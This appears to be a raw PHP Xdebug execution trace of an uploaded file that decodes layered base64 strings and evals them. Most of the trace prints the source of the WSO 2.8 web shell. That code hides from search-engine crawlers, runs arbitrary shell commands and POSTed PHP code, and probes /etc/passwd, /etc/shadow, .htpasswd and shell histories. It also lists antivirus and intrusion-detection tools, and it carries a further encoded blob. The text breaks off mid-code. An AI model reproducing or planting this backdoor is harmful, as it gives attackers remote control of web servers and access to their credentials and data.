Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 01:50:28.836176] 1 0 1 0.000138 393512 1 3 0 0.000665 579448 {main} 1 /var/www/html/uploads/flo.php 0 0 1 A /var/www/html/uploads/flo.php 2 $part2 = 'MVViR2xaVkdoc1RucFZNbGxxVVROYWFrRnBUM2R2YTFreU9YTmlNMGxuVUZOQmFVa3lVbTFPVTBrM1EybFNhMXBYV21oa1YzZ3dXREpHYW1SSGJIWmlhVUU1U1VOa1IyRlhlR3hqTURGb1ltbGpOME5wVW10YVYxcG9aRmQ0TUZnelZucGFWamxvWVcxR05FbEVNR2RrU0VveFdsUnpTMHBIVW14YWJVWXhZa2hTWmxreWFHaGpiazVzWkVOQk9VbERaRmhoVnpWcllqTmtla3hVUlhsT1ZFVnVUM2R2WjBOdGJHMUxRMFpzWWxoQ01HVlRaMnRZTVU1R1ZXeGFSbFZzYzI1VFJsSlZWVVk1VmxVd1ZsTllNRVpJVWxVMVZVb3hNSEJMVTBJM1EybEJaMGxEUVd0a1dFNXNZMnRHYmxwWE5UQmplVUU1U1VkR2VXTnRSalZMUTBwSVlqSTVibUpIVldsTVEwRnBWVEo0TVdOdVFXbE1RMEZwVkZaT1Qx' 1 A /var/www/html/uploads/flo.php 3 $part1 = 'U2tkR01XUkhhR1pqUjBaNlkzb3dhVTU2UVRGYVJHTXpUWHBWTTFwVVRtdE5WRVV5V1ZkUmVV' 1 A /var/www/html/uploads/flo.php 4 $part3 = 'sRGEwdEpRMEZuU1VkT2FHSkhlR1prV0U1c1kydzViV1JYTldwTFEyUm9XVE5TY0dJeU5HNUpRelJuU2tZNVVWUXhUbFZYZVdSb1NqRXdjRTkzY0d4bFIyd3dUM2R2U3c9PQ==' 1 A /var/www/html/uploads/flo.php 6 $b = 'base64_' 1 A /var/www/html/uploads/flo.php 7 $b .= 'decode' 1 A /var/www/html/uploads/flo.php 9 $v = 'U2tkR01XUkhhR1pqUjBaNlkzb3dhVTU2UVRGYVJHTXpUWHBWTTFwVVRtdE5WRVV5V1ZkUmVVMVViR2xaVkdoc1RucFZNbGxxVVROYWFrRnBUM2R2YTFreU9YTmlNMGxuVUZOQmFVa3lVbTFPVTBrM1EybFNhMXBYV21oa1YzZ3dXREpHYW1SSGJIWmlhVUU1U1VOa1IyRlhlR3hqTURGb1ltbGpOME5wVW10YVYxcG9aRmQ0TUZnelZucGFWamxvWVcxR05FbEVNR2RrU0VveFdsUnpTMHBIVW14YWJVWXhZa2hTWmxreWFHaGpiazVzWkVOQk9VbERaRmhoVnpWcllqTmtla3hVUlhsT1ZFVnVUM2R2WjBOdGJHMUxRMFpzWWxoQ01HVlRaMnRZTVU1R1ZXeGFSbFZzYzI1VFJsSlZWVVk1VmxVd1ZsTllNRVpJVWxVMVZVb3hNSEJMVTBJM1EybEJaMGxEUVd0a1dFNXNZMnRHYmxwWE5UQmplVUU1' 1 A /var/www/html/uploads/flo.php 10 $i = 1 2 4 0 0.001022 763808 base64_decode 0 /var/www/html/uploads/flo.php 11 1 'U2tkR01XUkhhR1pqUjBaNlkzb3dhVTU2UVRGYVJHTXpUWHBWTTFwVVRtdE5WRVV5V1ZkUmVVMVViR2xaVkdoc1RucFZNbGxxVVROYWFrRnBUM2R2YTFreU9YTmlNMGxuVUZOQmFVa3lVbTFPVTBrM1EybFNhMXBYV21oa1YzZ3dXREpHYW1SSGJIWmlhVUU1U1VOa1IyRlhlR3hqTURGb1ltbGpOME5wVW10YVYxcG9aRmQ0TUZnelZucGFWamxvWVcxR05FbEVNR2RrU0VveFdsUnpTMHBIVW14YWJVWXhZa2hTWmxreWFHaGpiazVzWkVOQk9VbERaRmhoVnpWcllqTmtla3hVUlhsT1ZFVnVUM2R2WjBOdGJHMUxRMFpzWWxoQ01HVlRaMnRZTVU1R1ZXeGFSbFZzYzI1VFJsSlZWVVk1VmxVd1ZsTllNRVpJVWxVMVZVb3hNSEJMVTBJM1EybEJaMGxEUVd0a1dFNXNZMnRHYmxwWE5UQmplVUU1' 2 4 1 0.001575 948160 2 4 R 'SkdGMWRHaGZjR0Z6Y3owaU56QTFaRGMzTXpVM1pUTmtNVEUyWVdReU1UbGlZVGhsTnpVMllqUTNaakFpT3dva1kyOXNiM0lnUFNBaUkyUm1OU0k3Q2lSa1pXWmhkV3gwWDJGamRHbHZiaUE5SUNkR2FXeGxjMDFoYmljN0NpUmtaV1poZFd4MFgzVnpaVjloYW1GNElEMGdkSEoxWlRzS0pHUmxabUYxYkhSZlkyaGhjbk5sZENBOUlDZFhhVzVrYjNkekxURXlOVEVuT3dvZ0NtbG1LQ0ZsYlhCMGVTZ2tYMU5GVWxaRlVsc25TRlJVVUY5VlUwVlNYMEZIUlU1VUoxMHBLU0I3Q2lBZ0lDQWtkWE5sY2tGblpXNTBjeUE5SUdGeWNtRjVLQ0pIYjI5bmJHVWlMQ0FpVTJ4MWNuQWlMQ0FpVFZOT1FtOTBJaXdnSW1saFgyRnlZMmhwZG1WeUlpd2dJbGxoYm1SbGVDSXNJQ0pTWVcxaWJHVnlJaWs3' 1 A /var/www/html/uploads/flo.php 11 $v = 'SkdGMWRHaGZjR0Z6Y3owaU56QTFaRGMzTXpVM1pUTmtNVEUyWVdReU1UbGlZVGhsTnpVMllqUTNaakFpT3dva1kyOXNiM0lnUFNBaUkyUm1OU0k3Q2lSa1pXWmhkV3gwWDJGamRHbHZiaUE5SUNkR2FXeGxjMDFoYmljN0NpUmtaV1poZFd4MFgzVnpaVjloYW1GNElEMGdkSEoxWlRzS0pHUmxabUYxYkhSZlkyaGhjbk5sZENBOUlDZFhhVzVrYjNkekxURXlOVEVuT3dvZ0NtbG1LQ0ZsYlhCMGVTZ2tYMU5GVWxaRlVsc25TRlJVVUY5VlUwVlNYMEZIUlU1VUoxMHBLU0I3Q2lBZ0lDQWtkWE5sY2tGblpXNTBjeUE5SUdGeWNtRjVLQ0pIYjI5bmJHVWlMQ0FpVTJ4MWNuQWlMQ0FpVFZOT1FtOTBJaXdnSW1saFgyRnlZMmhwZG1WeUlpd2dJbGxoYm1SbGVDSXNJQ0pTWVcxaWJHVnlJaWs3' 1 A /var/www/html/uploads/flo.php 10 $i++ 2 5 0 0.001800 763808 base64_decode 0 /var/www/html/uploads/flo.php 11 1 'SkdGMWRHaGZjR0Z6Y3owaU56QTFaRGMzTXpVM1pUTmtNVEUyWVdReU1UbGlZVGhsTnpVMllqUTNaakFpT3dva1kyOXNiM0lnUFNBaUkyUm1OU0k3Q2lSa1pXWmhkV3gwWDJGamRHbHZiaUE5SUNkR2FXeGxjMDFoYmljN0NpUmtaV1poZFd4MFgzVnpaVjloYW1GNElEMGdkSEoxWlRzS0pHUmxabUYxYkhSZlkyaGhjbk5sZENBOUlDZFhhVzVrYjNkekxURXlOVEVuT3dvZ0NtbG1LQ0ZsYlhCMGVTZ2tYMU5GVWxaRlVsc25TRlJVVUY5VlUwVlNYMEZIUlU1VUoxMHBLU0I3Q2lBZ0lDQWtkWE5sY2tGblpXNTBjeUE5SUdGeWNtRjVLQ0pIYjI5bmJHVWlMQ0FpVTJ4MWNuQWlMQ0FpVFZOT1FtOTBJaXdnSW1saFgyRnlZMmhwZG1WeUlpd2dJbGxoYm1SbGVDSXNJQ0pTWVcxaWJHVnlJaWs3' 2 5 1 0.002220 903104 2 5 R 'JGF1dGhfcGFzcz0iNzA1ZDc3MzU3ZTNkMTE2YWQyMTliYThlNzU2YjQ3ZjAiOwokY29sb3IgPSAiI2RmNSI7CiRkZWZhdWx0X2FjdGlvbiA9ICdGaWxlc01hbic7CiRkZWZhdWx0X3VzZV9hamF4ID0gdHJ1ZTsKJGRlZmF1bHRfY2hhcnNldCA9ICdXaW5kb3dzLTEyNTEnOwogCmlmKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAkdXNlckFnZW50cyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIik7CiAgICBpZihwcmVnX21hdGNoKCcvJyAuIGltcGxvZGUoJ3wnLCAkdXNlckFnZW50cykgLiAnL2knLCAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAg' 1 A /var/www/html/uploads/flo.php 11 $v = 'JGF1dGhfcGFzcz0iNzA1ZDc3MzU3ZTNkMTE2YWQyMTliYThlNzU2YjQ3ZjAiOwokY29sb3IgPSAiI2RmNSI7CiRkZWZhdWx0X2FjdGlvbiA9ICdGaWxlc01hbic7CiRkZWZhdWx0X3VzZV9hamF4ID0gdHJ1ZTsKJGRlZmF1bHRfY2hhcnNldCA9ICdXaW5kb3dzLTEyNTEnOwogCmlmKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAkdXNlckFnZW50cyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIik7CiAgICBpZihwcmVnX21hdGNoKCcvJyAuIGltcGxvZGUoJ3wnLCAkdXNlckFnZW50cykgLiAnL2knLCAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAg' 1 A /var/www/html/uploads/flo.php 10 $i++ 2 6 0 0.002421 718752 base64_decode 0 /var/www/html/uploads/flo.php 11 1 'JGF1dGhfcGFzcz0iNzA1ZDc3MzU3ZTNkMTE2YWQyMTliYThlNzU2YjQ3ZjAiOwokY29sb3IgPSAiI2RmNSI7CiRkZWZhdWx0X2FjdGlvbiA9ICdGaWxlc01hbic7CiRkZWZhdWx0X3VzZV9hamF4ID0gdHJ1ZTsKJGRlZmF1bHRfY2hhcnNldCA9ICdXaW5kb3dzLTEyNTEnOwogCmlmKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAkdXNlckFnZW50cyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIik7CiAgICBpZihwcmVnX21hdGNoKCcvJyAuIGltcGxvZGUoJ3wnLCAkdXNlckFnZW50cykgLiAnL2knLCAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAg' 2 6 1 0.002766 821184 2 6 R '$auth_pass="705d77357e3d116ad219ba8e756b47f0";\n$color = "#df5";\n$default_action = \'FilesMan\';\n$default_use_ajax = true;\n$default_charset = \'Windows-1251\';\n \nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n header(\'HTTP/1.0 404 Not Found\');\n exit;\n }\n}\n \n@ini_set(\'error_log\',NULL);\n@ini_s' 1 A /var/www/html/uploads/flo.php 11 $v = '$auth_pass="705d77357e3d116ad219ba8e756b47f0";\n$color = "#df5";\n$default_action = \'FilesMan\';\n$default_use_ajax = true;\n$default_charset = \'Windows-1251\';\n \nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n header(\'HTTP/1.0 404 Not Found\');\n exit;\n }\n}\n \n@ini_set(\'error_log\',NULL);\n@ini_s' 1 A /var/www/html/uploads/flo.php 10 $i++ 2 7 0 0.005183 1257192 eval 1 '$auth_pass="705d77357e3d116ad219ba8e756b47f0";\n$color = "#df5";\n$default_action = \'FilesMan\';\n$default_use_ajax = true;\n$default_charset = \'Windows-1251\';\n \nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n header(\'HTTP/1.0 404 Not Found\');\n exit;\n }\n}\n \n@ini_set(\'error_log\',NULL);\n@ini_set(\'log_errors\',0);\n@ini_set(\'max_execution_time\',0);\n@set_time_limit(0);\n@set_magic_quotes_runtime(0);\n@define(\'WSO_VERSION\', \'2.8\');\n \nif(get_magic_quotes_gpc()) {\n function WSOstripslashes($array) {\n return is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);\n }\n $_POST = WSOstripslashes($_POST);\n $_COOKIE = WSOstripslashes($_COOKIE);\n}\n \nfunction wsoLogin() {\n die("
Password: >\'>
");\n}\n \nfunction WSOsetcookie($k, $v) {\n $_COOKIE[$k] = $v;\n setcookie($k, $v);\n}\n \nif(!empty($auth_pass)) {\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $auth_pass);\n \n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $auth_pass))\n wsoLogin();\n}\n \nif(strtolower(substr(PHP_OS,0,3)) == "win")\n $os = \'win\';\nelse\n $os = \'nix\';\n \n$safe_mode = @ini_get(\'safe_mode\');\nif(!$safe_mode)\n error_reporting(0);\n \n$disable_functions = @ini_get(\'disable_functions\');\n$home_cwd = @getcwd();\nif(isset($_POST[\'c\']))\n @chdir($_POST[\'c\']);\n$cwd = @getcwd();\nif($os == \'win\') {\n $home_cwd = str_replace("\\\\", "/", $home_cwd);\n $cwd = str_replace("\\\\", "/", $cwd);\n}\nif($cwd[strlen($cwd)-1] != \'/\')\n $cwd .= \'/\';\n \nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;\n \nif($os == \'win\')\n $aliases = array(\n "List Directory" => "dir",\n "Find index.php in current dir" => "dir /s /w /b index.php",\n "Find *config*.php in current dir" => "dir /s /w /b *config*.php",\n "Show active connections" => "netstat -an",\n "Show running services" => "net start",\n "User accounts" => "net user",\n "Show computers" => "net view",\n "ARP Table" => "arp -a",\n "IP Configuration" => "ipconfig /all"\n );\nelse\n $aliases = array(\n "List dir" => "ls -lha",\n "list file attributes on a Linux second extended file system" => "lsattr -va",\n "show opened ports" => "netstat -an | grep -i listen",\n "process status" => "ps aux",\n "Find" => "",\n "find suid" => "find / -type f -perm -04000 -ls",\n "find suid in current dir" => "find . -type f -perm -04000 -ls",\n "find sgid" => "find / -type f -perm -02000 -ls",\n "find sgid files in current dir" => "find . -type f -perm -02000 -ls",\n "find config.inc.php" => "find / -type f -name config.inc.php",\n "find config*" => "find / -type f -name \\"config*\\"",\n "find config* in current dir" => "find . -type f -name \\"config*\\"",\n "find writable folders and files" => "find / -perm -2 -ls",\n "find writable folders and files in current dir" => "find . -perm -2 -ls",\n "find service.pwd" => "find / -type f -name service.pwd",\n "find service.pwd files in current dir" => "find . -type f -name service.pwd",\n "find .htpasswd" => "find / -type f -name .htpasswd",\n "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\n "find .bash_history" => "find / -type f -name .bash_history",\n "find .bash_history files in current dir" => "find . -type f -name .bash_history",\n "find .fetchmailrc" => "find / -type f -name .fetchmailrc",\n "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\n "Locate" => "",\n "locate httpd.conf" => "locate httpd.conf",\n "locate vhosts.conf" => "locate vhosts.conf",\n "locate proftpd.conf" => "locate proftpd.conf",\n "locate psybnc.conf" => "locate psybnc.conf",\n "locate my.conf" => "locate my.conf",\n "locate admin.php" =>"locate admin.php",\n "locate cfg.php" => "locate cfg.php",\n "locate conf.php" => "locate conf.php",\n "locate config.dat" => "locate config.dat",\n "locate config.php" => "locate config.php",\n "locate config.inc" => "locate config.inc",\n "locate config.inc.php" => "locate config.inc.php",\n "locate config.default.php" => "locate config.default.php",\n "locate config*" => "locate config",\n "locate .conf"=>"locate \'.conf\'",\n "locate .pwd" => "locate \'.pwd\'",\n "locate .sql" => "locate \'.sql\'",\n "locate .htpasswd" => "locate \'.htpasswd\'",\n "locate .bash_history" => "locate \'.bash_history\'",\n "locate .mysql_history" => "locate \'.mysql_history\'",\n "locate .fetchmailrc" => "locate \'.fetchmailrc\'",\n "locate backup" => "locate backup",\n "locate dump" => "locate dump",\n "locate priv" => "locate priv"\n );\n \nfunction wsoHeader() {\n if(empty($_POST[\'charset\']))\n $_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\n global $color;\n echo "" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . WSO_VERSION ."\n\n\n
\n
\n\n\n\n\n\n\n
";\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\n $totalSpace = $totalSpace?$totalSpace:1;\n $release = @php_uname(\'r\');\n $kernel = @php_uname(\'s\');\n $explink = \'http://exploit-db.com/search/?action=search&filter_description=\';\n if(strpos(\'Linux\', $kernel) !== false)\n $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\n else\n $explink .= urlencode($kernel . \' \' . substr($release,0,3));\n if(!function_exists(\'posix_getegid\')) {\n $user = @get_current_user();\n $uid = @getmyuid();\n $gid = @getmygid();\n $group = "?";\n } else {\n $uid = @posix_getpwuid(posix_geteuid());\n $gid = @posix_getgrgid(posix_getegid());\n $user = $uid[\'name\'];\n $uid = $uid[\'uid\'];\n $group = $gid[\'name\'];\n $gid = $gid[\'gid\'];\n }\n \n $cwd_links = \'\';\n $path = explode("/", $GLOBALS[\'cwd\']);\n $n=count($path);\n for($i=0; $i<$n-1; $i++) {\n $cwd_links .= "".$path[$i]."/";\n }\n \n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\n $opt_charsets = \'\';\n foreach($charsets as $item)\n $opt_charsets .= \'\';\n \n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\n if(!empty($GLOBALS[\'auth_pass\']))\n $m[\'Logout\'] = \'Logout\';\n $m[\'Self remove\'] = \'SelfRemove\';\n $menu = \'\';\n foreach($m as $k => $v)\n $menu .= \'[ \'.$k.\' ]\';\n \n $drives = "";\n if($GLOBALS[\'os\'] == \'win\') {\n foreach(range(\'c\',\'z\') as $drive)\n if(is_dir($drive.\':\\\\\'))\n $drives .= \'[ \'.$drive.\' ] \';\n }\n echo \'\'\n . \'\'\n . \'
Uname:
User:
Php:
Hdd:
Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\') . \'		\' . substr(@php_uname(), 0, 120) . \' [exploit-db.com]
\' . $uid . \' ( \' . $user . \' ) Group: \' . $gid . \' ( \' . $group . \' )
\' . @phpversion() . \' Safe mode: \' . ($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\')\n . \' [ phpinfo ] Datetime: \' . date(\'Y-m-d H:i:s\') . \'
\' . wsoViewSize($totalSpace) . \' Free: \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)
\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' [ home ]
\' . $drives . \'
Server IP:
\' . @$_SERVER["SERVER_ADDR"] . \'
Client IP:
\' . $_SERVER[\'REMOTE_ADDR\'] . \'
\'\n . \'\' . $menu . \'
\';eval(gzinflate(base64_decode(\'dZJNc5swEIb/iieTQ3ITuInLZHrAuBIrx9SA+dLFAxbBssRHQxMX//qqJk4y0+lhR6PZffTuu6vrrn3+tS1Ew7d88m1yRV3W7UyFssG2wAmefGStQ6RwMlAzT72OuyuRbnrPqVUNTiV5rU55GhxggXQ9iGU4ny38ttLsWE9Wlc5Vq4VmhF1d3i+mUK1DW6aGhyPFdPQikrG3MQKcIvw9wDDqnBmuMn2CY//DhDiIImzBxvAiUOii3RV1e67/q02xtQlimugoQFEcxTGOjOApjin9xKAspQ1L/TOzq/GUp7RnJD4UZqCWTjBlCbxQol5yIS/MT54ERvGmA0r3qbyWJb97IHvEXfv+cfgqOcEDM2MEhN59zMUa4PDmj9BX5sqLP+E3cfND2P/l1oQOawFjD+S8hz1LjCN3ZTvOSnbg9pVPjH2eHFuosxNbzE+rKTV12DmxUJHgrnDutDckHt99HGVWW7IM5Qxc5DmNjjrud2ZUlYP9vuvl0I95OT8xfS9M6zlPohaacbelgP7jH8nZ1cOkfM3VTZH35f2XLS93LS9vrj/9vNvbhz8= \')));\n}\n \nfunction wsoFooter() {\n $is_writable = is_writable($GLOBALS[\'cwd\'])?" (Writeable)":" (Not writable)";\n echo "\n
\n\n \n \n \n \n \n \n \n \n \n
Change dir:
>\'>
Read file:
>\'>
Make dir:$is_writable
>\'>
Make file:$is_writable
>\'>
Execute:
>\'>
\n \n \n \n \n Upload file:$is_writable
>\'>

";\n}\n \nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\n function posix_getpwuid($p) {return false;} }\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\n function posix_getgrgid($p) {return false;} }\n \nfunction wsoEx($in) {\n $out = \'\';\n if (function_exists(\'exec\')) {\n @exec($in,$out);\n $out = @join("\\n",$out);\n } elseif (function_exists(\'passthru\')) {\n ob_start();\n @passthru($in);\n $out = ob_get_clean();\n } elseif (function_exists(\'system\')) {\n ob_start();\n @system($in);\n $out = ob_get_clean();\n } elseif (function_exists(\'shell_exec\')) {\n $out = shell_exec($in);\n } elseif (is_resource($f = @popen($in,"r"))) {\n $out = "";\n while(!@feof($f))\n $out .= fread($f,1024);\n pclose($f);\n }\n return $out;\n}\n \nfunction wsoViewSize($s) {\n if (is_int($s))\n $s = sprintf("%u", $s);\n \n if($s >= 1073741824)\n return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\n elseif($s >= 1048576)\n return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\n elseif($s >= 1024)\n return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\n else\n return $s . \' B\';\n}\n \nfunction wsoPerms($p) {\n if (($p & 0xC000) == 0xC000)$i = \'s\';\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\n else $i = \'u\';\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\n return $i;\n}\n \nfunction wsoPermsColor($f) {\n if (!@is_readable($f))\n return \'\' . wsoPerms(@fileperms($f)) . \'\';\n elseif (!@is_writable($f))\n return \'\' . wsoPerms(@fileperms($f)) . \'\';\n else\n return \'\' . wsoPerms(@fileperms($f)) . \'\';\n}\n \nfunction wsoScandir($dir) {\n if(function_exists("scandir")) {\n return scandir($dir);\n } else {\n $dh = opendir($dir);\n while (false !== ($filename = readdir($dh)))\n $files[] = $filename;\n return $files;\n }\n}\n \nfunction wsoWhich($p) {\n $path = wsoEx(\'which \' . $p);\n if(!empty($path))\n return $path;\n return false;\n}\n \nfunction actionSecInfo() {\n wsoHeader();\n echo \'

Server security information

\';\n function wsoSecParam($n, $v) {\n $v = trim($v);\n if($v) {\n echo \'\' . $n . \': \';\n if(strpos($v, "\\n") === false)\n echo $v . \'
\';\n else\n echo \'
\' . $v . \'
\';\n }\n }\n \n wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\n if(function_exists(\'apache_get_modules\'))\n wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\n wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\n wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\n wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\n wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\n wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\n $temp=array();\n if(function_exists(\'mysql_get_client_info\'))\n $temp[] = "MySql (".mysql_get_client_info().")";\n if(function_exists(\'mssql_connect\'))\n $temp[] = "MSSQL";\n if(function_exists(\'pg_connect\'))\n $temp[] = "PostgreSQL";\n if(function_exists(\'oci_connect\'))\n $temp[] = "Oracle";\n wsoSecParam(\'Supported databases\', implode(\', \', $temp));\n echo \'
\';\n \n if($GLOBALS[\'os\'] == \'nix\') {\n wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\');\n wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\');\n wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\n wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\n if(!$GLOBALS[\'safe_mode\']) {\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\n echo \'
\';\n $temp=array();\n foreach ($userful as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Userful\', implode(\', \',$temp));\n $temp=array();\n foreach ($danger as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Danger\', implode(\', \',$temp));\n $temp=array();\n foreach ($downloaders as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Downloaders\', implode(\', \',$temp));\n echo \'
\';\n wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\n wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\n echo \'
posix_getpwuid ("Read" /etc/passwd)
From
To
\';\n if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\n $temp = "";\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\n $uid = @posix_getpwuid($_POST[\'p2\']);\n if ($uid)\n $temp .= join(\':\',$uid)."\\n";\n }\n echo \'
\';\n wsoSecParam(\'Users\', $temp);\n }\n }\n } else {\n wsoSecParam(\'OS Version\',wsoEx(\'ver\'));\n wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\n wsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\n }\n echo \'
\';\n wsoFooter();\n}\n \nfunction actionPhp() {\n if(isset($_POST[\'ajax\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', true);\n ob_start();\n eval($_POST[\'p1\']);\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), "\\n\\r\\t\\\\\'\\0") . "\';\\n";\n echo strlen($temp), "\\n", $temp;\n exit;\n }\n if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', 0);\n \n wsoHeader();\n if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {\n echo \'

PHP info

\';\n ob_start();\n phpinfo();\n $tmp = ob_get_clean();\n $tmp = preg_replace(array (\n \'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\n \'!td, th {(.*)}!msiU\',\n \'!]+>!msiU\',\n ), array (\n \'\',\n \'.e, .v, .h, .h th {$1}\',\n \'\'\n ), $tmp);\n echo str_replace(\'
\';\n }\n echo \'

Execution PHP-code

\';\n echo \' send using AJAX
\';\n    if(!empty($_POST[\'p1\'])) {\n        ob_start();\n        eval($_POST[\'p1\']);\n        echo htmlspecialchars(ob_get_clean());\n    }\n    echo \'
